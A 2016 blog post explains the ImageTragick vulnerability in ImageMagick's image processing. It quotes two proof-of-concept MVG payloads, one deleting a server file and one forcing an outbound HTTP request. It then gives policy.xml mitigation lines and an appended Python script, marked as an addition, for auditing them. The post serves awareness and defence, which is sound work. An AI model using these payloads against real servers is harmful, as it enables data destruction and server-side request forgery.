So yes, a server that merely has ImageMagick running is not vulnerable, but if your web application allows users to upload an image that is then processed by ImageMagick (for example, watermarked or resized), then your server is vulnerable.
If your Drupal, WordPress or similar web application leverages ImageMagick's simple processing tools, your server may be insecure. This may allow an attacker to gain access to credentials, customer information, or anything else on your server.

The exploit for this vulnerability has been named ImageTragick. A dedicated website has been set up. Branding a flaw could look like a laugh, but perhaps it is the best way to spread the word?

The flaw is ridiculously simple, and script kiddies could be using it in the wild.

Examples (from imagetragick.com)

1. File Deletion
delete.mvg

    push graphic-context
    viewbox 0 0 640 480
    image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
    pop graphic-context

    $ echo "goodbye, file" > /tmp/delete.txt
    $ convert delete.mvg out.png # deletes /tmp/delete.txt

2. Create a GET or FTP request

get.mvg

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(http://example.com/)'
    pop graphic-context

    $ convert get.mvg out.png # HTTP request to example.com

ImageMagick have responded with a fix.

If your site is vulnerable, I suggest reading more about the flaw at imagemagick.com, or simply adding the following to your policy.xml file:

    <policy domain="coder" rights="none" pattern="EPHEMERAL" />
    <policy domain="coder" rights="none" pattern="HTTPS" />
    <policy domain="coder" rights="none" pattern="MVG" />
    <policy domain="coder" rights="none" pattern="MSL" />
    <policy domain="coder" rights="none" pattern="TEXT" />
    <policy domain="coder" rights="none" pattern="SHOW" />
    <policy domain="coder" rights="none" pattern="WIN" />
    <policy domain="coder" rights="none" pattern="PLT" />
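
To confirm the entries above are actually active in a deployed policy.xml, here is an added audit sketch (not from the original post or the ImageMagick project). It parses the XML rather than grepping it, so commented-out entries do not count, and it understands `{A,B}` lists and `*` globs in `pattern`. The names `unblocked_coders`, `expand_braces` and the sample policy are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

# The eight coder patterns from the policy.xml snippet on this page.
PAGE_CODERS = ["EPHEMERAL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT"]

def expand_braces(pattern):
    """Expand {A,B,C} groups, the list form used in policy glob patterns."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    return [p for alt in m.group(1).split(",")
            for p in expand_braces(head + alt.strip() + tail)]

def unblocked_coders(policy_xml, coders=PAGE_CODERS):
    """Return the coders that policy_xml does not reliably disable.

    Conservative rule (an assumption of this example, chosen so the result
    does not depend on evaluation order): a coder is blocked only if some
    matching entry has rights="none" and no matching entry grants a right.
    """
    root = ET.fromstring(policy_xml)  # the parser drops XML comments
    denied, granted = set(), set()
    for pol in root.iter("policy"):
        if pol.get("domain", "").lower() != "coder":
            continue
        rights = pol.get("rights", "").strip().lower()
        for glob in expand_braces(pol.get("pattern", "")):
            for coder in coders:
                if fnmatchcase(coder, glob):  # case-sensitive on purpose
                    (denied if rights == "none" else granted).add(coder)
    return [c for c in coders if c not in denied or c in granted]

# Constructed sample: two active entries, one commented out, one unrelated.
SAMPLE = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="{MVG,MSL}" />
  <!-- <policy domain="coder" rights="none" pattern="HTTPS" /> -->
  <policy domain="resource" name="memory" value="256MiB" />
</policymap>"""

if __name__ == "__main__":
    print("Not disabled:", unblocked_coders(SAMPLE))
```

For a real file, pass its contents, e.g. `unblocked_coders(open(path).read())`, where `path` is wherever your installation keeps policy.xml.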
Saturday, May 7, 2016